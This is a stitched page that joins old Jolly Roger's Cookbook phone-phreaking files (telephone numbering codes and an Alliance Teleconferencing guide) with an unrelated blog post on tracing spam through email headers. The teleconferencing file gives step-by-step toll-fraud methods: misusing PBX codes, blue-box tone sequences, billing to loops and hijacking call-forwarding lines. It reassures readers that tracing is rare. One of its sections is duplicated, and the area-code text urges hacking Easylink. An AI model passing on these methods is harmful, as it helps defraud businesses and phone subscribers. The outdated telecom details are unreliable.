710 - TWX (USA)
800 - WATS
810 - TWX (USA)
900 - DIAL-IT Services
910 - TWX (USA)





The other area codes never cross state lines, therefore each state
must have at least one exclusive NPA code. When a community is
split by a state line, the CO #'s are often interchangeable (ie,
you can dial the same number from two different area codes).

TWX (Telex II) consists of 5 teletype-writer area codes. They are
owned by Western Union. These SAC's may only be reached via other
TWX machines. These run at 110 baud (last I checked! They are most
likely faster now!). Besides the TWX #'s, these machines are
routed to normal telephone #'s. TWX machines always respond with
an answerback. For example, WU's FYI TWX # is (910) 279-5956. The
answerback for this service is "WU FYI MAWA".

If you don't want to but a TWX machine, you can still send TWX
messages using Easylink [800/325-4112]. However you are gonna have
to hack your way onto this one!

700:

700 is currently used by AT&T as a call forwarding service. It is
targeted towards salesmen on the run. To understand how this
works, I'll explain it with an example. Let's say Joe Q. Salespig
works for AT&T security and he is on the run chasing a phreak
around the country who royally screwed up an important COSMOS
system. Let's say that Joe's 700 # is (700) 382-5968. Everytime
Joe goes to a new hotel (or most likely SLEAZY MOTEL), he dials a
special 700 #, enters a code, and the number where he is staying.
Now, if his boss received some important info, all he would do is
dial (700) 382-5968 and it would ring wherever Joe last progammed
it to. Neat, huh?

800:

This SAC is one of my favourites since it allows for toll free
calls. INWARD WATS (INWATS), or Inward Wide Area
Telecommunications Service is the 800 #'s that we are all familiar
with. 800 #'s are set up in service areas or bands. There are 6 of
these. Band 6 is the largest and you can call a band 6 # from
anywhere in the US except the state where the call is terminated
(that is why most companies have one 800 number for the countery
and then another one for their state.) Band 5 includes the 48
contiguous states. All the way down to band 1 which includes only
the states contiguous to that one. Therefore, less people can
reach a band 1 INWATS # than a band 6 #.

Intrastate INWATS #'s (ie, you can call it from only 1 state)
always have a 2 as the last digit in the exchange (ie, 800-NX2-
XXXX). The NXX on 800 #'s represent the area where the business is
located. For example, a # beginning with 800-431 would terminate
at a NY CO.

800 #'s always end up in a hunt series in a CO. This means that it
tries the first # allocated to the company for their 800 lines; if
this is busy, it will try the next #, etc. You must have a minimum
of 2 lines for each 800 #. For example, Travelnet uses a hunt
series. If you dial (800) 521-8400, it will first try the #
associated with 8400; if it is busy it will go to the next
available port, etc. INWATS customers are billed by the number of
hours of calls made to their #.

OUTWATS (OUTWARD WATS): OUTWATS are for making outgoing calls
only. Largecompanies use OUTWATS since they receive bulk-rate
discounts. Since OUTWATS numbers cannot have incoming calls, they
are in the format of:

(800) *XXX-XXXX

Where * is the digit 0 or 1 (or it may even be designated by a
letter) which cannot be dialed unless you box the call. The *XX
identifies the type of service and the areas that the company can
call.

Remember:

INWATS + OUTWATS = WATS EXTENDER

900:

This DIAL-IT SAC is a nationwide dial-it service. It is use for
taking television polls and other stuff. The first minute
currently costs an outrageous 50-85 cents and each additional
minute costs 35-85 cents. Hell takes in a lot of revenue this way!

Dial (900) 555-1212 to find out what is currently on this service.

CO CODES
~~~~~~~~

These identify the switching office where the call is to be
routed. The following CO codes are reserved nationwide:

555 - directory assistance
844 - time. These are now in!
936 - weather the 976 exchange
950 - future services
958 - plant test
959 - plant test
970 - plant test (temporary)
976 - DIAL-IT services

Also, the 3 digit ANI & ringback #'s are regarded as plant test
and are thus reserved. These numbers vary from area to area.

You cannot dial a 0 or 1 as the first digit of the exchange code
(unless using a blue box!). This is due to the fact that these
exchanges (000-199) contains all sorts of interesting shit such as
conference #'s, operators, test #'s, etc.

950:

Here are the services that are currently used by the 950 exchange:

1000 - SPC
1022 - MCI Execunet
1033 - US Telephone
1044 - Allnet
1066 - Lexitel
1088 - SBS Skyline

These SCC's (Specialized Common Carriers) are free from fortress
phones! Also, the 950 exchange will probably be phased out with
the introduction of Equal Access

Plant Tests:

These include ANI, Ringback, and other various tests.

976:

Dial 976-1000 to see what is currently on the service. Also, many
bbs's have listings of these numbers.

N11 codes:
----------
Bell is trying to phase out some of these, but they still exist in
most areas.

011 - international dialing prefix
211 - coin refund operator
411 - directory assistance
611 - repair service
811 - business office
911 - EMERGENCY

International Dialing
~~~~~~~~~~~~~~~~~~~~~

With International Dialing, the world has been divided into 9
numbering zones. To make an international call, you must first
dial: International Prefix + Country code + National #

In North America, the international dialing prefix is 011 for
station-to-station calls. If you can dial International #'s
directly in your area then you have International Direct Distance
Dialing (IDDD).

The country code, which varies from 1 to 3 digits, always has the
world numbering zone as the first digit. For example, the country
code for the United Kingdom is 44, thus it is in world numbering
zone 4. Some boards may contain a complete listing of other
country codes, but here I give you a few:

1 - North America (US, Canada, etc.)
20 - Egypt
258 - Mozambique
34 - Spain
49 - Germany
52 - Mexico (southern portion)
7 - USSR
81 - Japan
98 - Iran (call & hassle those bastards!)

If you call from an area other than North America, the format is
generally the same. For example, let's say that you wanted to call
the White House from Switzerland to tell the prez that his
numbered bank account is overdrawn (it happens, you know! ha ha).
First you would dial 00 (the SWISS international dialing refix),
then 1 (the US country code), followed by 202-456-1414 (the
national # for the White House. Just ask for Georgy and give him
the bad news!)

Also, country code 87 is reserved for Maritime mobile service, ie,
calling ships:

871 - Marisat (Atlantic)
871 - Marisat (Pacific)
872 - Marisat (Indian)

International Switching:
------------------------

In North America there are currently 7 no. 4 ESS's that perform
the duty of ISC (Inter-nation Switching Centers). All
international calls dialed from numbering zone 1 will be routed
through one of these "gateway cities". They are:

182 - White Plains, NY
183 - New York, NY
184 - Pittsburgh, PA
185 - Orlando, Fl
186 - Oakland, CA
187 - Denver, CO
188 - New York, NY

The 18X series are operator routing codes for overseas access (to
be furthur discussed with blue boxes). All international calls use
a signaling service called CCITT.It is an international standard
for signaling.

Ok.. there you go for now! If you wanna read more about this, read
part two which is the next file #36 in the Jolly Roger's cookbook!

Senin, 02 Maret 2009

Backtracking EMAIL Messages

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255




# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.


Basic Alliance Teleconferencing

Basic Alliance Teleconferencing Courtesy of the Jolly Roger

Introduction:
------------
This phile will deal with accessing, understanding and using the Alliance
Teleconferencing Systems.... it has many sections and for best use should
be printed out...enjoy...

Alliance:
--------
Alliance Teleconferencing is an independant company which allows the general
public to access and use it's conferencing equipment. Many rumors have
been floating apound that Alliance is a subsidary of AT&T.
Well, they are wrong. As stated above, Alliance is an entirely independant
company. They use sophisticated equipment to allow users to talk to many
people at once.

The Number:
---------
Alliance is in the 700 exchange, thus it is not localized, well, not
in a way. Alliance is only in certain states, and only
residents of these certain states can access by dialing direct. This,
however, will be discussed in a later chapter. The numbers for alliance are
as follows:
0-700-456-1000 (chicago)
-1001 (los angeles)
-1002 (chicago)
-1003 (houston)
-2000 (?)
-2001 (?)
-2002 (?)
-2003 (?)
-3000 (?)
-3001 (?)
-3002 (?)
-3003 (?)

The locations of the first 4 numbers are known and i have stated them.
However, the numbers in the 200x and 300x are not definately known.
Rumor has it that the pattern repeats itself but this has not been proven.

Dialing:
-------
As stated before, Alliance is only in certain stated and only these states
can access them via dialing direct. However, dialing direct causes your
residence to be charged for the conference and conference bills are not low!!!
Therefore, many ways have been discovered to start a conference without
having it billed to ones house. They are as follows:

1) Dialing through a PBX
2) Incorporating a Blue Box
3) Billing to a loop
4) Billing to a forwarded call

I am sure there are many more but these are the four i will deal with.

Dialing through a PBX:
------- ------- - ---
Probably the easiest method of creating a free conference is through a PBX.
Simply call one in a state that has Alliance, input the PBX's code,
dial 9 for an outside line and then dial alliance.
An example of this would be:

PBX: 800-241-4911

When it answers it will give you a tone. At this tone input your code.

Code: 1234

After this you will receive another tone, now dial 9 for an outside line.
You will now hear a dial tone. Simply dial Alliance from this point and
the conference will be billed to the PBX.




Dialing through a PBX:
------- ------- - ---
Probably the easiest method of creating a free conference is through a PBX.
Simply call one in a state that has Alliance, input the PBX's code,
dial 9 for an outside line and then dial alliance.
An example of this would be:

PBX: 800-241-4911

When it answers it will give you a tone. At this tone input your code.

Code: 1234

After this you will receive another tone, now dial 9 for an outside line.
You will now hear a dial tone. Simply dial Alliance from this point and
the conference will be billed to the PBX.

Using a Blue Box:
----- - ---- ---
Another rather simple way of starting a conference is with a Blue Box.
The following procedure is how to box a conference:
Dial a number to box off of. In this example we will use 609-609-6099
When the party answers hit 2600hz. This will cause the fone company's
equipment to think that you have hung up. You will hear a
You have now 'seized' a trunk. After this, switch to multi-frequency
and dial:

KP-0-700-456-x00x-ST
KP=KP tone on Blue Box
x=variable between 1 and 3
ST=ST tone on Blue Box
The equipment now thinks that the operator has dialed Alliance from her
switchboard and the conference shall be billed there. Since Blue Boxing
is such a large topic, this is as far as I will go into it's uses.

Billing to a loop:
------- -- - ----
A third method of receiving a free conference is by billing out to a
loop. A loop is 2 numbers that when two people call, they can talk
to each other. You're saying woop-tee-do right? Wrong! Loops can be
usefull to phreaks. First, dial alliance direct. After going
through the beginning procedure, which will be discussed later in this
tutorial, dial 0 and wait for an Alliance operator. When she answers
tell her you would like to bill the conference to such and such a
number. (A loop where your phriend is on the other side) She will then
call that number to receive voice verification.
Of course your phriend will be waiting and will accept the charges.
Thus, the conference is billed to the loop.

Billing to call forwarding:
------- -- ---- ----------
When you dial a number that is call forwarded, it is first answered by
the original location, then forwarded. The original location will
hang up if 2600hz is received from only ond end of the line.
Therefore, if you were to wait after the forwarded residence answered,
you would receive the original location's dial tone.

Example:
Dial 800-325-4067
The original residence would answer, then forward the call, a second
type of ringing would be heard. When this second residence answers
simply wait until they hang up. After about twenty seconds you will
then receive the original residence's dial tone since it heard 2600hz
from one end of the line. Simply dial Alliance from this point and the
conference will be billed to the original residence.
These are the four main ways to receive a free conference. I am sure
many more exist, but these four are quite handy themselves.

Logon Procedure:
----- ---------
Once Alliance answers you will hear a two-tone combination. This is their
way of saying 'How many people do you want on the conference dude?'
Simply type in a 2-digit combination, depending on what bridge of Alliance
you are on, between 10 and 59. After this either hit '*' to cancel the
conference size and inout another or hit '#' to continue.
You are now in Alliance Teleconferencing and are only seconds away from
having your own roaring conference going strong!!!

Dialing in Conferees:
------- -- ---------
To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.

npa=area code
pre=prefix
suff=suffix

If the number is busy, or if no one answers simply hit '*' and your call
will be aborted. But, if they do answer, hit the '#' key.
This will add them to the conference.
Now commence dialing other conferees.

Joining Your Conference:
------- ---- ----------
To join your conference from control mode simply hit the '#' key.
Within a second or two you will be chatting with all your buddies.
To go back into control mode, simply hit the '#' key again.

Transferring Control:
------------ -------
To transfer control to another conferee, go into control mode, hit the
# 6+1+npa+pre+suff of the conferee you wish to give control to. If after,
you wish to abort this transfer hit the '*' key.

:Transfer of control is often not available. When you
receive a message stating this, you simply cannot transfer control.

Muted Conferences:
----- -----------
To request a muted conference simply hit the 9 key. I am not exactly
sure what a muted conference is but it is probably a way to keep unwanted
eavesdroppers from listening in.

Dialing Alliance Operators:
------- -------- ---------
Simply dial 0 as you would from any fone and wait for the operator to answer.

Ending Your Conference:
------ ---- ----------
To end your conference all together, that is kick everyone including
yourself off, go into control mode and hit '*'...after a few seconds
simply hang up. Your conference is over.

Are Alliance Operators Dangerous?
--- -------- --------- ---------
No. Not in the least. The worst they can do to you while you are having
a conference is drop all conferees including yourself. This is in no
way harmful, just a little aggravating.

Alliance and Tracing:
-------- --- -------
Alliance can trace, as all citizens of the United States can.
But this has to all be pre-meditated and AT&T has to be called and it's
really a large hastle, therefore, it is almost never done. Alliance simply
does not want it known that teenagers are phucking them over.
The only sort of safety equipment Alliance has on-line is a simple pen
register. This little device simply records all the numbers of the
conferees dialed. No big deal. All Alliance can do is call up that persons
number, threaten and question. However, legally, they can do nothing because
all you did was answer your fone.

:Almost all instructions are told to the person in command by Alliance
recordings. A lot of this tutorial is just a listing of those
commands plus information gathered by either myself or the phellow
phreaks of the world!!!

(written by the Trooper)


In the CookBook 4! -= Exodus =-